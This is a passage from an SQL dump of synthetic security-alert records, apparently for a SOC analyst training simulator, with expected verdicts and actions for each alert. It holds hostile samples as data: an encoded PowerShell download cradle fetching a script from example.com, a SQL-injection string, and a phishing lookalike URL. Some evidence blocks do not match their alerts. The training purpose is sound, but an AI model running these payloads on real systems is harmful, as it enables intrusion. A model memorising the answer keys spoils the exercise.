hosts phishing content aimed at credential harvesting\"}}],\"expected_actions\":[\"block_url\",\"alert_user\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL and sender email are both indicative of a phishing attempt, requiring immediate action to prevent credential theft.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email URL Detected\",\"date\":\"2026-03-15T20:58:16.051Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1710, 'Failed Login Attempts from Foreign IP Address', 'medium', 'Firewall', 'Multiple failed login attempts detected from an external IP address, potentially indicating a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T04:20:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.5\",\"username\":\"admin\",\"hostname\":\"MAIL-SERVER\",\"failed_attempts\":5}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP listed for suspicious activity, but not confirmed for malicious intent\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the mail server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in login attempts\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts is relatively low, suggesting an incorrect configuration or a user error rather than a targeted attack.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1711, 'PowerShell Download Cradle with Encoded Script Execution', 'critical', 'CrowdStrike', 'A PowerShell download cradle was detected executing an encoded script from a suspicious external IP, indicating a potential malware attack.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"WORKSTATION-01\",\"command_line\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24gJ2h0dHBzOi8vZXhhbXBsZS5jb20vc2NyaXB0LnBzMSc=\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24gJ2h0dHBzOi8vZXhhbXBsZS5jb20vc2NyaXB0LnBzMSc=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command execution from a known malicious IP indicates a true positive malware incident.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1712, 'Suspicious Process Hollowing Detected in explorer.exe', 'high', 'SentinelOne', 'Process hollowing detected within explorer.exe, potentially indicating a sophisticated malware attempt to evade detection.', 'Malware', 'T1055.012', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"mjohnson\",\"hostname\":\"LAPTOP-02\",\"command_line\":\"explorer.exe hollowed_process.exe\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"hollowed_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File associated with malware variants\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"explorer.exe hollowed_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique used to evade detection\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of process hollowing in explorer.exe is a strong indicator of malware attempting to evade standard detection mechanisms.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.055Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"LAPTOP-02\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1713, 'Failed Brute Force Attempt from Foreign IP', 'medium', 'Carbon Black', 'A series of failed login attempts from an unusual foreign IP has been detected, suggesting a possible brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.42\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"failed_attempts\":25}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated login failures from a known malicious IP suggest a brute force attempt against the admin account.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:57:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:56:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:55:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:54:16.057Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1714, 'PowerShell Activity from Internal Network Detected', 'low', 'Sysmon', 'An internal IP executed a PowerShell command with encoded data. This might be a benign administrative script.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"\",\"username\":\"jsmith\",\"hostname\":\"SERVER-03\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded PowerShell command likely used for administration\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell activity is consistent with legitimate administrative scripting and does not indicate malicious behavior.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.059Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jsmith\\\",\\\"hostname\\\":\\\"SERVER-03\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnSGVsbG8gV29ybGQn\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1715, 'SQL Injection Attempt Detected on Web Server', 'high', 'CrowdStrike', 'A SQL injection attempt was identified targeting the corporate web server from an external IP.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:55:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.122\",\"dst_ip\":\"192.168.1.20\",\"username\":\"\",\"hostname\":\"WEB-SERVER\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.122\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal web server address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The signature of the attempted SQL injection matches known attack patterns, confirming the threat.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1716, 'Potential Phishing Email with Malicious URL', 'medium', 'Sysmon', 'A suspicious email containing a potentially malicious URL was detected, mimicking a trusted domain.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:10:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.114.5\",\"dst_ip\":\"192.168.1.30\",\"username\":\"kthompson\",\"hostname\":\"EMAIL-SERVER\",\"email_sender\":\"noreply@trusted.com\",\"url\":\"http://trusted.com.secure-login.co\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@trusted.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain slightly altered to mimic legitimate sender\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://trusted.com.secure-login.co\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL part of phishing campaign\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.114.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for hosting phishing sites\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL and sender analysis confirm a phishing attempt aiming to deceive recipients into entering credentials.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.063Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:10:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.114.5\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"kthompson\\\",\\\"hostname\\\":\\\"EMAIL-SERVER\\\",\\\"email_sender\\\":\\\"noreply@trusted.com\\\",\\\"url\\\":\\\"http://trusted.com.secure-login.co\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1717, 'Benign Internal PowerShell Script Execution', 'low', 'Carbon Black', 'A PowerShell script was executed on an internal machine. The activity appears to be a routine system administration task.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"DC-01\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Commonly used PowerShell command for administration\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell script execution matches typical system administration patterns and does not indicate malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand 